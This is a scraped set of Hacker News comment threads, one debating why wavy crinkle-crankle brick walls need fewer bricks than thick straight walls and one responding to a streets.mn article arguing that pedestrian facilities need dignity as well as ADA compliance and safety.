A sine wave is probably closer, which would give an arc length of sqrt(1+cos(2pix/L)^2). This has no reasonable closed form I can find but it seems like it would be about 21% longer than a straight line.
Edit: Also a semicircle is pi/2 times as long as its diameter, not pi times.
Article links to this post with another derivation.
https://www.johndcook.com/blog/2019/11/19/crinkle-crankle-ca...
I'd like to know if this wavy wall technique requires non-square bricks to be stronger. And is it stronger against sideways forces along the concave and convex sections. If it's only the same strength as a straight wall then I'd think it'd be worse as a retaining wall?
Soda cans also have a counterintuitive efficiency feature: concave bottoms. If a can with a flat bottom held the same amount of soda, it would be shorter and have less surface area, but its metal body would need to be thicker to withstand the same pressure. In the end, it'd require more aluminum.
https://www.csmonitor.com/Science/Science-Notebook/2015/0414...
^Probably not the best article for this, but it was easy to find and has a link to a chemical engineer's video.
Same principle as concave bottoms on wine bottles (though the concern there is more about jostling and impact during transport than pressurized contents).
I think the Christian Science Monitor is perfectly fine. https://mediabiasfactcheck.com/christian-science-monitor/
Aluminium's also more expensive than steel but experiences sufficiently less breakage to justify the price.
Engineer Guy (Bill Hammack) has a great video about this.
https://www.youtube.com/watch?v=hUhisi2FBuw
Edit: Just realized this is the same video you referenced. All of his work is fantastic.
Also in the current design you can stack them. This is probably worth something in terms of wrapping of pallets of cans.
Standard video:
'The Ingenious Design of the Aluminum Beverage Can'
https://chbe.illinois.edu/news/stories/engineer-guy-ingeniou...
Same with cans, corrugated sides, tops and bottoms are for strength and pressure resistance. Actually most corrugated anything is done so for strength.
I think that's also why a pretty small kink in the can will make it tremendously easier to crush against your forehead as a party trick :-)
Or, more likely, it's a similar principle also at place in the design.
Same about waviness on plastic bottles.
https://www.riverkeeper.org/wp-content/uploads/2018/04/bottl...
Corrugated cardboard just is a wavy wall, sandwiched in between two straight walls.
You can also observe corrugated steel and its use in construction, shipping containers, etc. Because these are steel and stronger than paper, the sandwich layers are not needed
You can also peel the label of a tin (can) of baked beans in your cupboard to see the the ripples added for rigidity.
Car floor tunnels serve the same purpose. Increase rigidity at low material cost.
If it wasn't for fashion it would probably be the most popular building material for roofs. Make your roof out of that and at an angle and you probably never worry about leaks for decades.
This headline is awful and sounds sensational.
Better headline would be 'wavy walls use fewert bricks than thicker straight walls'
Another 'article' summarizing a reddit post. They even took the top comment and put it at the end
> wavy walls that lawnmowers surely detest!
Lawn edges that can't be mowed, because of a house wall or something, are an issue at my place. If just leave the grass at the edge, it grows long, then grows to seed, and the long grass seems to expand in width inexorably over time.
I don't want to use a plastic-shedding line trimmer or herbicides. I end up pulling out the grass near the edge, leaving a bare strip that takes a while to grow back, but it's a bit labour-intensive.
I'll save folks some reading: they're comparing a very thick straight wall with a much thinner wavy wall.
The primary point is that you can't make an equivalently thin straight wall due to natural (wind and gravity, primarily) forces. Kinda weird to summarize it without the crux of why.
I feel like everyone this far is missing something, or perhaps just I am.
I understand that a wavy wall will be stronger than a straight wall of the same thickness, therefore if you need that additional strength it technically uses fewer bricks to reach it.
That said, if the alternative is a 2 layer straight wall, is the wavy wall equally as strong? Or is it just stronger than the single layer wall?
Without knowing anything about the subject matter, I'd assume that the strength goes in order of single-layer straight, wavy, double-layer straight. No? Seems like needing just the amount of strength the wavy wall provides, and no more, would be a fairly rare use case. Leading to double-layer straights most of the time anyway.
Well, tbf the article doesn't even try to explain how wavy walls are stronger than straight ones, or how fewer bricks are needed.
It's a matter of stability more so than 'strength', no? Having never attempted to push over a brick wall, I'd guess that it'd be easier to do so for a straight double wythe than a wavy single... but yeah, baseless intuition here!
The base of a double wythe wall is still only like 7', which if you're stacking say 84' of brick on top of that... seems pretty unstable to me.
The wavy design is probably just as strong as the double layer (possibly stronger depending on the direction of force).
The issue with a single layer wall isn't really the strength between bricks, or the bricks themselves - it's that a single layer wall has a very narrow base and is subject to tipping over.
The wave in the design makes the base of the wall act is if it were MUCH wider, preventing the tipping action of a single layer.
So the wavy design is only as strong as single layer of bricks, but it has a base 2 to 3 times the width of even the double layer wall designs. It will be much more resistant to tipping forces, but less resistant to impact forces.
The thing about most walls is they aren't really load bearing - they just delineate owned space - so the wavy design is great for large properties. Much less great if it's a tiny space and you're losing a good chunk of sqft to the wave.
'Strength' is used to refer to things like wind hitting the wall, not a car. That is, the wall toppling, not breaking. So the wavy wall with its wide base is quite strong.
if you think of it from the context that the diagonal length of a brick is it's longest dimension, you can start to intuitively imagine how this efficiency in layout pattern is achieved.
There's been a one-brick-thick wavy wall off a busy road in Cambridge for at least fifty years: https://goo.gl/maps/sxTsPW71F317gwK88
It kept getting hit by cars until they finally installed a guard rail.
Driving in the Boston area is hard enough already, we don't need to add wavy walls into the mix ;-)
It took me way too long to see that the cars are driving on the right, so this is Cambridge MA, not Cambridge UK.
Does something about this design make it more likely to get hit by cars?
I guess the force of impact would be greater relative to scraping a straight wall.
The labor to build such a wall may dominate the savings in brick. But if you're building a brick wall, maybe you don't care much about either.
I wonder if this sort of structure could be built by 3D printing, say with concrete or even soil.
Labor is pretty much directly proportional to number of bricks placed. If you save on bricks, you save on labor.
If that was your point, sorry for misreading you.
In the era in which these were commonly used, bricks were largely made on-site or very nearby. So you saved on labor twice - once to make the bricks, and again to place them.
There's actually a similar concept in 3D printing called gyroid infill, it's essentially a 3D version of the wavy wall:
https://www.wevolver.com/article/understanding-the-gyroid-in...
Would it be stronger for the same amount of bricks if it didn't have the inflection point where there is no curvature, and instead had intersecting arcs like: 》》》》 ?
I think it would be less strong than a wavy wall of similar brick count, but still more efficient than an equivalent strength wall built in a straight line.
My mental reasoning for this is that a (pseudo) sinusoid spends a lot more of its path further away from the centre. Thinking of it as a point moving along the path through time, it will dwell and the peaks, and cruise through he centre. The contribution of each brick to wall stiffness will be related to the cube of the distance from the centre line (neutral axis), so more 'time' spent at the peaks is best. This holds true on the macro scale, but could vary on the scale of a half 'wavelength' as the lack of inversion of curvature could be beneficial there.
Everything moderately reasonable seems to be better than a straight line in this instance. In the limit, two much thinner walls, far apart, is the optimal solution, but that becomes unreasonable as those walls must be coupled together to provide strength.
If you made the arcs deeper than the curves of the wave I think yes. If you just sliced and flipped the arcs from the original wave, no. It'd be a straightforward calculation for the moment of inertia but I'm too lazy to do it. It's all about placing the most mass farthest from the centroid line.
I think you're asking if a series of arcs is stronger than a wavy line. It's a great question and I think the answer to that would require a full model of the two walls to calculate all the stresses, etc. But I think it would also depend on the question of 'stronger against what?' A pushing force but at what point and at what angle. Even height might make a difference.
My gut instinct is that the point where a wavy wall changes from curving one way to another is a slight weak point and perhaps an angle there would actually be stronger. Might be totally wrong.
Another reason for some a wavy walls involves capturing more heat from sunlight over the course of a day, in this example for nearby plants:
> The Dutch, meanwhile, began to develop curved varieties that could capture more heat, increasing thermal gain (particularly useful for a cooler and more northern region). The curves also helped with structural integrity, requiring less thickness for support.
[0] https://99percentinvisible.org/article/fruit-walls-before-gr...
I learned about this and a lot more about walled gardens when I searched for the orgin of the term 'walled garden' to do with technology today.
Yeah but more space, and are therefore the wrong choice a lot of the time.
Which is why they are very popular in the less densely populated and large lot size areas of the English Country side. By the time of the New World, fast population growth meant the economics of brick production wasn't feasible and copious alternative methods were easier (wood/picket fences, wood studs+wire, chain-link or wrought iron/brick + iron). All less long lasting, but cheaper, quicker and easier to install with almost the same benefits (fencing of pets + livestock, property demarcation, security). Which is why you don't see them nearly as often outside of Europe (Asia having used their own alternatives better suited for their environment and needs, Africa having had New World techniques used during colonialism).
Not a physics person...but is this similar to the effect of 'rolling' thin pizza so it won't droop? Or is it strictly about being better at wind resistance?
I see this a lot in the rural US with wooden fences but had no idea why it was done, but I guess its for the same reason (stability). Apparently they've done it since the 1600s.
https://www.louispage.com/blog/bid/11160/worm-fence-what-is-...
Still, this seemed totally unecessary until I realized this mean they dont have to put any posts into the ground. No digging holes, which would be really nice when you're trying to fence up very large acreage.
Interesting pictures.
Not a complicated subject, but somehow seeing it with straight lines made it completely obvious and intuitive vs the wavy wall.
The US is so bad at naming things!
A Serpentine Wall sounds better than a Worm Fence or Snake Fence.
Crinkle Crankle Wall is a bit more fun than ZigZag Fence.
A Ribbon Wall seems like a nice thing to have on your property vs a Battlefield Fence.
Not digging post holes would help, but the real time savings would be in not having to saw the logs to produce boards.
It only takes a couple minutes to split the log, and would be less tiring than trying to saw the number of boards you'd need for a fence. You can also use smaller logs you'd otherwise ignore or use for firewood due to low yield when sawing.
For that matter, you don't have to worry about milling, joinery, or bringing enough nails to fasten boards. You can also use green wood without any worries. All you have to do is stack.
In a world without power tools, the split-rail fence really was an ingenious design. It effectively removed the skill requirement altogether, and let you spend your time on more urgent tasks.
I used to make fences in Wales, with it famously rocky ground. The fences we made were effectively straight lines which were bound at each terminal point by big posts dug into the ground and braced with side struts. Installing one of these posts could take a full day.
Those fences are also popular in places where it is cold in the winter. No posts in the ground means no frost heave. A fence like that can sit unmaintained for decades before it starts to fall apart.
it's not for stability, it's because it doesn't require posts so it's cheap and quick
No they don't
> [Wavy walls] use more bricks than a straight wall of the same thickness
However they 'resist horizontal forces, like wind, more than straight wall would.'
> So if the alternative to a crinkle crankle wall one-brick thick is a straight wall two or more bricks thick, the former saves material
https://www.johndcook.com/blog/2019/11/19/crinkle-crankle-ca...
If a one brick thick straight wall can't stand, then you don't have a wall you have a pile of bricks. It's pointless to consider the impractical case.
The same reason is why my roof has corrugated metal sheeting, rather than plate.
This was a question I had students prove out. With the bending moment of inertia being related to the cube of the thickness for a flat plate, the maths trickles out very quickly.
We need your expertise here please: ttps://news.ycombinator.com/item?id=36899973
The important part is https://www.johndcook.com/blog/2019/11/19/crinkle-crankle-ca...
I actually find that web page quite disappointing because there is no comparison of the relative strengths of the different wall shapes.
This feels a bit like diet clickbait...
'use fewer bricks than a straight wall'*
*A straight wall of the approximal strength and length of a wavy wall, not just length.
My counter would be that from a practical perspective the amount of space wasted by the wavy design seems to negate the usefulness of the design.
Probably makes the lawn crew dizzy when mowing it too!
No space is wasted, unless you need to squeeze in a rectangle thing (e.g. tennis court, driveway) into a tight lot. But boundary disputes in urban areas are already bad enough so trying to define a wavey boundary wont be fun! That said how much freaking character would this add to a back garden!
this is an overly cynical take. headlines are brief by necessity. nobody would read that and think that a curved line from A to B is shorter than a straight line between the same points.
the first paragraph explains it,
> these wavy walls actually use less bricks than a straight wall because they can be made just one brick thin, while a straight wall—without buttresses—would easily topple over
The 'space wasted' on an estate of many hundreds, if not, thousands of acres is minimal. Given that often the bricks used were made and fired on site, it definitely saved on resources and labour.
There's a stately home close to me that has a very short run of one of these walls, and the remains of the old brick kiln up on the hill side. If you know what you're looking for, you can also still see the hollows in the ground where the clay was dug, now fill of trees and bushes.
Yes, it's clickbait and nonsense. Obviously a straight wall would use fewer bricks. Your brick wall is going to be one brick thick either way, nobody is going to try to somehow make the straight wall as strong as the wavy wall. Most likely the straight wall is already way stronger than it needs to be.
If you have plenty of space but you're tight on money, it's an ingenious solution.
The solution for the space problem is obvious: just make the wall wave in the longitudinal direction instead of the transversal direction.
> This feels a bit like diet clickbait...
This is fun clickbait. Straight to the point, totally random quirky trivia, and most of the page is nice pictures. Love it.
wikipedia says:
'leading to greater strength than a straight wall of the same thickness of bricks without the need for buttresses.'
I was trying to figure out how lengthwise it could have fewer bricks.
> *A straight wall of the approximal strength and length of a wavy wall, not just length.
The article suggests that, if you attempted to build a straight wall with a similar amount of bricks, that it would not be able to be freestanding (i.e. it would need to be buttressed or it would fall over). That's a significant feature of a wall to some people, so I don't think it's fair to dismiss the utility of that by suggesting that it's simply 'less bricks for comparable strength,' it's 'less bricks for a freestanding wall.'
If you want a freestanding brick wall, this seems to be the 'ideal' way to do it, assuming you have the space required for the wave. I think the space needed would be a function of the wall height, so if you need a tall wall, you need more horizontal space for the wave and a wavey wall becomes less ideal.
The extra space doesn't have to be fully wasted. You could plant bushes or small trees in the concave sections.
Walls have purpose beyond neatly cut lawns.
This wall would work well at road field boundaries where a couple feet makes less practical difference than the large saving in materials.
Every dip in the wave is an opportunity to plant beautiful bush, flowers, or shrubbery.
Amen to this. In a tabloidish sense.
I read the title and thought 'duh'. Maybe others were intrigued and clicked, but for me, this is just obvious. I had lots of legos, and own more now as a grandpa than, er, uh, I should. I guess spatial reasoning about bricks just is second hand at this point.
What the article likely leaves out, is that the all of the 'corner only' touch points are going to create a more 'pourous' wall. And collection points for crap.
Has someone figured out the ideal frequency / amplitude of the wave? Maybe the frequency that matches the strength of a one-brick straight wall? The pictures strike me as possibly wavier than needed.
It would be strength/brick use tradeoff.
I want to know how that compares to just adding some rebar along the way
I've seen this design when making ultra light weight structures. It does work but can be difficult to manufacture
> these wavy walls actually use less bricks than a straight wall because they can be made just one brick thin, while a straight wall—without buttresses—would easily topple over.
And what about a straight wall with buttresses? Can we make them just as sturdy with fewer bricks?
No, that's sort of the point? There are fewer extra bricks used to make the curve than would be required to buttress / reinforce a straight wall.
'Popularized in England' - maybe popularized, but such walls are by no means popular or common.
'The county of Suffolk seems to be home to countless examples of these crinkle crankle walls. On freston.net you can find 100 wavy walls that have been documented and photographed.'
Although it's not explicitly said, let's suppose that every one of those wavy walls is in Suffolk. The population of the county is 761 350 - let's assume there are 100 000 homes (although there is the city of Ipswitch, it's otherwise largely a rural county where single-family homes will be common). So only roughly one-in-one-thousand homes in Suffolk has such a 'wavy wall'. Elsewhere in the country probably even less - e.g. I've never seem one.
Any for everyone complaining about mowing - do you actually have grass all the way up to your boundary wall? In my experience it's pretty common to have a flower bed running all the length of the boundary, so mowing would not be a problem.
So only roughly one-in-one-thousand homes in Suffolk has such a 'wavy wall'
yes, but you also need to take into account how many homes have any brick wall at all.
If you follow the link in the post explaining the math behind everything, it says:
'They use more bricks than a straight wall of the same thickness but they don't have to be as thick.'
The post also says this in the first paragraph:
> Popularized in England, these wavy walls actually use less bricks than a straight wall because they can be made just one brick thin, while a straight wall—without buttresses—would easily topple over.
In other words, a serpentine wall is stronger per amount of material used than a straight one. They also allow use of a single-thickness of brick without other supports
True, but they use less bricks than a straight wall of the same strength, because the straight wall would have to be thicker or have buttresses. So it depends what you're doing - does the wall have to withstand that kind of loads or not?
'Use, more bricks that the straight wall' misses a point a bit, because a straight wall like this would easily topple.
A better description is 'uses less bricks than a straight wall of equivalent resistance to horizontal forces'
Very cool. So what is the optimal solution?
To maximize the strength and minimize the bricks used, is a sine the best shape, or is there a better curve, and what is the best period and amplitude of the waveform? Does this solution change with the height of the wall?
Most likely you want the smallest curve that's achieves an acceptable amount of stability. Since the wave exists to prevent the wall from toppling, a pure sine is probably overkill.
So I guess a factor then will be how tall your wall is. A very tall wall will need a deep wave, just like a wall one brick high would need no wave at all.
"Hackernews discovers first year university engineering statics/analysis from articles that are really just reposts of 3 year old reddit content"
603 points 3 days ago by PaulHoule in 452nd position
streets.mn | Estimated reading time – 9 minutes | comments | anchor
Have you ever had a friend return from a vacation and gush about how great it was to walk in the place they'd visited? "You can walk everywhere! To a café, to the store. It was amazing!" Immediately after saying that, your friend hops in their car and drives across the parking lot to the Starbucks to which they could easily have walked.
Why does walking feel so intuitive when we're in a city built before cars, yet as soon as we return home, walking feels like an unpleasant chore that immediately drives us into a car?
A lot contributes to this dilemma, like the density of the city, or relative cheapness and convenience of driving. But there's a bigger factor here: We don't design the pedestrian experience for dignity.
This is a national problem, but certainly one we can see throughout our own Twin Cities metro: Even where pedestrian facilities are built, brand-new, ADA-compliant and everything else — using them feels like a chore, or even stressful and unpleasant.
Dignity is a really important concept in active transportation, but one that we often miss in the conversation about making streets better for walking and biking. I've been delighted to see the term appear on a social media account advocating for pedestrians. But as we plan and design better streets for active transportation, we need to consider the dignity of the pedestrian experience.
Three related concepts exist in designing great pedestrian spaces, and they can be arranged similarly to Maslow's hierarchy of needs. The base of the pyramid is the most essential, but having a complete and delightful pedestrian experience requires all three layers. The layers are: compliance, safety and dignity.
At the bottom of the pyramid you have compliance — for pedestrian facilities, that mainly means complying with ADA rules. This requirement is non-negotiable for agencies because failure to obey exposes them to legal challenges. The ADA has done a great deal to make pedestrian facilities better for all — certainly wheelchair users, but also those who walk, use strollers, ride bicycles on sidewalks, etc.
Unfortunately, compliance with ADA rules alone often does not yield good pedestrian facilities.
For example, many agencies will simply remove pedestrian facilities to reduce the cost of compliance. A good example is the intersection of France and Parklawn avenues in Edina. If you were on the west side of France and wanted to walk to the Allina clinic in 2013, you could simply have crossed on the north crosswalk. But to improve ADA compliance, Edina removed the north crosswalk in 2014. Now, you would have to cross the busy signalized intersection three times just to continue on the north sidewalk.
In other cases, compliance is in good faith but not enough to make a pedestrian facility really usable — because complete compliance would entail a much larger project. This can be found when a broken-down sidewalk, or one with obstructions in the way, gets brand-new corner curb ramps but no other improvements. A wheelchair user can easily get up off the street at the corner, but can't go farther than 10 feet without hitting another impediment.
In the middle of the pyramid you have safety — both perceived and actual. It is possible to create a facility that is compliant but does not seem very safe. Picture sparkling new curb ramps to cross a 45-mph surface street with no marked crosswalk. In other cases, facilities are well-designed and safe, but may still not be dignified.
An example of this is in my own backyard, on Hennepin County's Nicollet Avenue. A very-welcome project last year installed new crosswalks to popular Augsburg Park. These have durable crosswalk markings, excellent signage and refuge medians. But crossing still feels like a negotiation with drivers. And the overall sidewalk experience on the 1950s street is still lacking, with sidewalks at the back-of-curb and little to no shade.
Finally, we have dignity. To determine whether a facility is dignified, I propose a simple test:
If you were driving past and saw a friend walking or rolling there, what would your first thought be:
1. "Oh, no, Henry's car must have broken down! I better offer him a ride."
2. "Oh, looks like Henry's out for a walk! I should text him later."
This is a surprisingly good test. Picture seeing your friend on a leafy sidewalk versus walking along a 45 mph suburban arterial. What would you think intuitively?
But to get more specific, these are the key factors in making a pedestrian experience dignified:
A dignified facility needs consistent shade during hot summer months. At night, shadows should be minimal and the route should be clear. Especially when a tree canopy is present, this is best achieved with more individual fixtures installed lower to the ground and at a lower light output. However, a fairly consistent light level can be achieved even with basic cobraheads, as long as there are enough to light the corridor fully.
Routes should be intuitive, easy, and not feel tedious to navigate. Having to make sharp, 90° turns or go out of your way feel awkward and make you feel like your time and effort is wasted — even if the detour is relatively minor.
It's a very uncomfortable experience to walk along a wide-open corridor with no walls or edge definition — and it's a common experience along suburban arterials, where you may have a wide road on one side and a wide-open parking lot on the other. You feel exposed and vulnerable. At the same time, overgrown sidewalks or ones that encroach on pedestrian space can feel claustrophobic and inconvenient. The right balance is needed.
Finally, engaging frontage is always more appealing than blank frontage. The extreme of this principle is obvious: Walking down a traditional main street is more pleasurable than walking through an industrial park. But even where land uses are similar, engagement of frontage can vary a lot: picture the difference between walking past front doors of houses in a traditional neighborhood, and walking past privacy fences and back yards in cul-de-sac suburban neighborhoods. The traditional neighborhood is more interesting and engaging to walk through.
When I was visiting downtown Northfield, I noted a new building along Water Street (MN-3), which had similar materials to the older downtown buildings on Division: windows, brick, [cultured] stone base. Yet the back was turned to the street, and the experience walking past was undignified.
Creating compliant sidewalks and trails is a high priority for agencies seeking to avoid litigation and serve pedestrians on the most basic level. Although that has some benefits, it isn't enough. Whether actively undermining walkability (like removing crosswalks to achieve ADA compliance) to simply not doing enough (adding a new curb ramp to an otherwise wheelchair-hostile sidewalk), we need to go much further.
To make walking and rolling a desirable, everyday activity, we need facilities that are compliant, safe and dignified. We have many examples in our communities of great pedestrian ways — but we have a long way to go to make it universal, and truly move the needle toward walking.
Streets.mn is a 501(c)(3) nonprofit. Our members and donors help us keep Minnesota's conversation about land use and planning moving forward.
I thought (and hoped) this post was going to mention the bizarre american phenomenon where people driving by a person walking have the urge to scream something at them.
The same can be said for virtually any societal change. Want people to proactively fight climate change? It turns out guilting people doesn't work, but give them a dignified existence and they will immediately care about the world they live in.
>but give them a dignified existence and they will immediately care about the world they live in.
What does 'a dignified existence' mean as it relates to climate change?
Is that so? The most dignified, people with the most money, are also causing the most desctruction.
I find it odd to say people are fighting climate change if they actively contribute to climate's destruction. Doing it for a short time with a clearly stated end date would be one thing. However, almost nobody emits less than the crucial threshold of 2 t CO2/year.
At some point you have to admit that if you aren't doing it, you aren't doing it.
Nah, with people who can produce 10's-100's more pollution per person than others, making an individual choice to do better makes little difference.
Certainly learning to make small choices in the right direction (stop denying local net zero energy projects, switch away from heavy fossil fuel consumption vehicles, etc) are important individual contributions, but ultimately nothings going to get done en mass until nations start bullying each other into compliance.
South Africa is a generally developed nation and its entire energy grid are almost entirely coal. The US is pretty hard on global carbon energy initiatives because they're now a net positive oil and gas producer? Lower priced net zero tech will certainly steer the narrative as time goes on, but will it be fast enough to kill greedy self-interest in the status quo..
How about more driveable cities? There are a few walkies out there, but a stated preference for walking usually comes down to sour grapes (can't afford a car or a move to the burbs), or poor urban planning making driving more onerous than it should be. Dignity is car ownership and the infrastructure to make the most of it.
How about not. It's not sour grapes that people prefer walking, and even if you had a government program to give everyone a car, what then? Congratulations, you've just made more traffic. Car's don't scale. They are super convenient and I will admit to having one (sometimes two!). But being unable to afford one doesn't deal with what to do when it breaks down, or gets stolen, or is towed, or gets clamped for unpaid parking tickets. There is no dignity in having a shitbox car that's 20 years old and falling apart and is just threatening to break down on you.
I think what's being noticed here, as in many urbanist conversations, is that our urban conditions are primarily reflective of the vastly unequal socio-economic structure we have at large.
In places where the working poor are the most disadvantaged, there also tends to be the highest auto dependency. (Think American South, Panama City, Panama etc)
To Soap box for a moment, almost all of our problems are reflective of our vast inequality. Our ability to live more sustainably, enjoy greater opportunity, ability to form new businesses, household formations, civic function etc. ultimately are limited by the degree of inequality a nation faces.
The problem is that the shining example of low-inequality urbanism (Western Europe) achieved this by having effectively the most exclusionary immigration policy in the West for two centuries.
Europe may have great biking culture and equality, but they have effectively sacrificed pluralism.
Don't agree with this at all.
On one hand, it's kind of a tautology - sure, if you're in a city that is very car-dependent, it's a disadvantage to the working poor because owning a car costs money.
But in the US there are also (usually older) cities with relatively great public transportation that are more walkable that also have enormous amounts of wealth inequality.
Doesn't really have anything to do with inequality, in the US at least it's mostly just reflective of when cities were built and developed. Pre-WWII cities like NYC and Boston have (again, relatively) great public transit options and huge walkable parts, while newer cities (often in the South) developed around the car.
A lot of improvement could be make by just enforcing the laws. Many cities across the US allow sidewalk parking for example. My neighbor has a Tesla Y and his charging station is literally on the sidewalk, he can afford the car but not a house with a garage.
Weird complaint because it says a lot about political dysfunction in American society when a (mostly) self-driving car costs about $40,000 but a reasonably decent house in those cities where those cars are built cost about 15-20x at around $800,000. Let's get rid of arbitrary suburban zoning codes that keep the status quo that makes density and walkability a low priority for "neighborhood character"
I love how the author puts dignity over safety. So timely.
They go hand in hand; unsafe infrastructure is inherently undignified to use. It is both unsafe and undignified to walk in a dirt ditch due to lack of sidewalks.
The pyramid structure is used to illustrate that upper layer concepts are supported by the bottom layer concepts. So, in this case, dignity is less essential than safety. Given safety, one can begin to develop dignity.
In the 'pyramid' style graphic the author uses, dignity being above safety implies that dignity is less essential than safety, not more.
'People should walk!'
Pictures of miles long suburban corridors with no services or business along them.
Maybe.. people don't walk there.. because there's no _reason_ to be walking there.
If you want people to walk, give them a reason other than 'I don't like cars.'
That's what '15 min cities' is about. The YIMBYs also push for accessible amenities, through zoning changes, to make areas more walkable.
You just cited a chief complaint that people against a car dominated culture have about car culture as if they never thought of it, never thought of one of their own major arguments?
Yes, problem is complex but also easy fixable in long term: abolish parking reqs & allow building dense buildings & force building nice sidewalk+trees+bike lane+ safety islands on every street renovation. This way there is no upfront cost to rebuild everything instantly, instead same public resources will be used(street renovation money is already allocated) and the town will become more walkable gradually
Agree and disagree with the article. Was an intern at a local governance, Americans with disabilities act (ADA) office for a year. It was a city with history, and not a very good city planning at the start. Yes, need to compliance, reality is, it is very hard. Like you built everything on top of a single MySQL and then facing the scalability challenge so you will need to re-shard every other 6 months - and worse, as re-architecture a city faces much more complex problems.
Well, as long as municipalities offer a fraction of what you can make on the free market those systems will never be adequate.
[flagged]
> Please don't post shallow dismissals, especially of other people's work. A good critical comment teaches us something.
I spent a few weeks recently cycling from LA to the Mexican border across non-coastal Southern California. Zero complaints about cycling in that part of the USA: I was pleased by how many hard shoulders had been turned into bike lanes, and drivers seemed courteous.
But man, was walking in towns a drag. If I left the bike safely at a hotel and wanted to stroll over to a restaurant or supermarket, every intersection was button-operated traffic lights where pedestrians wait ages for their turn to cross. Then, the pedestrian light flashes for almost too little time to cross the six or seven lanes of traffic. The sheer width of ordinary US roads must have a deterrent effect.
> I was pleased by how many hard shoulders had been turned into bike lanes, and drivers seemed courteous.
But how many are protected bike lanes, instead of just paint? Painted bike lanes are only helpful for relatively confident cyclists, and obviously do virtually nothing to actually protect people on bikes. Imagine if we started replacing sidewalks with painted walk lanes!
> The sheer width of US roads must have a deterrent effect.
Yup. In Munich, not only are roads generally not as wide, but if they're even sorta of wide, they get a pedestrian island or two.
If we want a shift to walking, we need cities to plant around 100x the number of trees they have.
Ever walk through an old, mature neighbourhood? Usually there are tons of people on the sidewalks, and a primary reason is that there are mature trees providing plenty of shade.
Then try walking in a new neighbourhood with barely any shade. It is awful.
One of the fundamental axioms of traffic engineering is you can't have trees too close to the edge of the road, because drunk/speeding drivers might get hurt. It is not just that the neighborhoods are mature enough for trees to have grown in, it's that they predate this science.
https://highways.dot.gov/safety/rwd/provide-safe-recovery/cl...
People walked under sun since forever. That's what hats are for. What you're really saying is walking under the sun crosses a discomfort threshold for you which driving and walking under shade doesn't.
I like mature trees and love walking among them (e.g., downtown Sacramento). In 99% of the US more trees would be better (and I try to contribute by planting an acorn or other tree seed when I spy a place a sapling might not get mowed, wherever I go). But I still consider more trees a distant second to buildings closer together, without room for trees (or, as typical, empty space or junk). If there's room for many mature trees, the place is fundamentally not dense enough to be totally amazing for a life of walking, as opposed to walking tourism.
That would help, but there are plenty of walkable cities with not-great tree cover.
I don't think Barcelona or Tokyo are gonna win any awards for having lots of trees.
I'm curious what the rates of walking are in Sacramento now, given that it's got that whole 'City of Trees' moniker and is also hot as Hell during the summer. I've honestly never been there in the summer, so I couldn't even share anecdotes. I'm not finding anything useful on Google.
What you say makes sense, when I walk in my own (new-ish development) neighborhood in Orange county, I specifically go to the areas where trees are more developed and provide more shade.
We had trees, they ripped them out in the name of safety.
'A drink driver might swerve off the road' killed so many old growth trees in the US.
100%l the lack of tree cover everywhere is criminal.
Three sticking points in my experience trying to help manage street trees in a neighborhood of 400 homes:
1. Planter strips are too small. This leads to infrastructure conflicts that are costly like lifting sidewalks and exploding irrigation lines. The problem is many municipalities simply have standard streets too wide and planters too narrow.
2. Maintaining trees is an ongoing expense and if not managed by an HOA or municipality the costs explode as individuals have to pay a crew to drag out equipment for just a few trees.
3. Lack of mandatory diversity- my neighborhood is 60% ash because the builder got a good deal 15 years ago after the emerald ash borer was found out east and wasn't top of mind in the west yet. If the EAB makes a strong foothold entire blocks will be starting from zero again.
I don't think the tree has much to do with it. While shade is important and should be even more so going forward, the general scale of new neighbourhoods compared to old ones is dramatically different.
It's like homes used to be so much closer to the sidewalk, it was just a couple of steps to reach the sidewalk and get going, but now it's these giant football field widths separating homes from the sidewalk, and then massive 4 lane sized roads separating sidewalks on either side. I'm exaggerating of course but the point is still there, the scale is just so different planting trees won't solve it.
This difference in scale creates such a different atmosphere, where sidewalks are just for dog walkers and bored baby sitters, not for regular commute. It's like if you want to talk to your neighbour from the sidewalk you have to bring a megaphone.
Can't upvote this enough. In Austin, with us on track to break the record of 100+ degree consecutive days, there is a huge difference between walking along nice, shaded areas and barren sidewalks. The trees don't even need to be that 'mature' - I've seen new developments plant grown trees that only take a couple years to really expand.
Like the blog post and other commenters mentioned, it's not just trees alone but especially in hotter climates it can make all the difference.
Unfortunately trees are often seen as a danger to car drivers on roads over a certain speed limit so traffic engineers dislike them.
Then try walking in a new neighbourhood with barely any shade. It is awful.
Love how south-centric this statement is. In Northern countries, that's true for a month typically, otherwise 'oh god please I hope the sun will shine on me'.
In December, I see 4 hours of sun, where the light gets above tree tops. And that's in Southern Canada!
Not a hatred of trees, but a dislike of shade trees.
edit: until I visited Texas, I never understood why people wore hats. The sun is never hot enough here for it. It never gets as high in the sky. Yet it's a brutal beast in Texas. I can only imagine further south..
Yes. Something like this https://twitter.com/Cobylefko/status/1682029080538136579
> Then try walking in a new neighbourhood with barely any shade. It is awful.
Neighborhoods you'd typically want to walk in do have shade because they were all built a long time ago and there is somewhere for you to walk to. Suburban neighborhoods aren't designed that way which is why even if there was shade there's still nowhere to walk to.
I do agree we need more trees planted and more shade. Unfortunately a lot of space near and around places people would want to walk or bike to us instead covered in pavement for cars and parking.
We can do more than one thing at once though. We can make areas more walkable while we also plant trees. And we can flip state highway departments [1] so that they focus on serving the people and their needs instead of themselves or a small, vocal minority.
[1] Note that departments of transportation in nearly all states are highway and road transit departments first and do next to nothing w.r.t better means of transportation. Their entire context is cars and drivers and you can confirm this by looking at the budget.
I spend lots of time walking through old, mature neighbourhoods with mature trees. Usually the sidewalks are empty, because stuff is too spread out to be walkable, and there just aren't enough people for sidewalks to be full. Yes, mostly in the US, but I've also observed this outside the US. Leafy+dense enough to be vibrant areas are really nice, but the exception. The thing that really makes new neighborhoods awful for walking isn't lack of shade, it's everything else about the new neighborhood, typically built in an extremely car-centric manner.
I didn't have a car between college and my late 30s. I thought I was a pro-walking chauvinist but turns out I was just a single guy living in NYC. Within a year of our first kid, I was living in the burbs with a large SUV.
Anti car people tend to be single or at least childless and they fail to understand that the majority of Americans aren't like them. About 40 percent of households have kids under 18, ie 60-80% of American adults have kids of the age where having a car is immensely helpful. So while these people also recognize that it's annoying to press the button to turn the light green or to walk around a parked car, those are nowhere near the top of their life's concerns.
So I think the 'we want' is a bit presumptuous in the headline. The guy who wrote the article is a city councilor and an avid biker but what he doesn't seem to be is a parent, so his concerns are skewed a certain way vs the mass of the population.
Like I said, I get the love of walking and walkable spaces, but I see now that this is way more interesting when you are single. As a parent you also get excited about things like tossing all your groceries into the trunk.
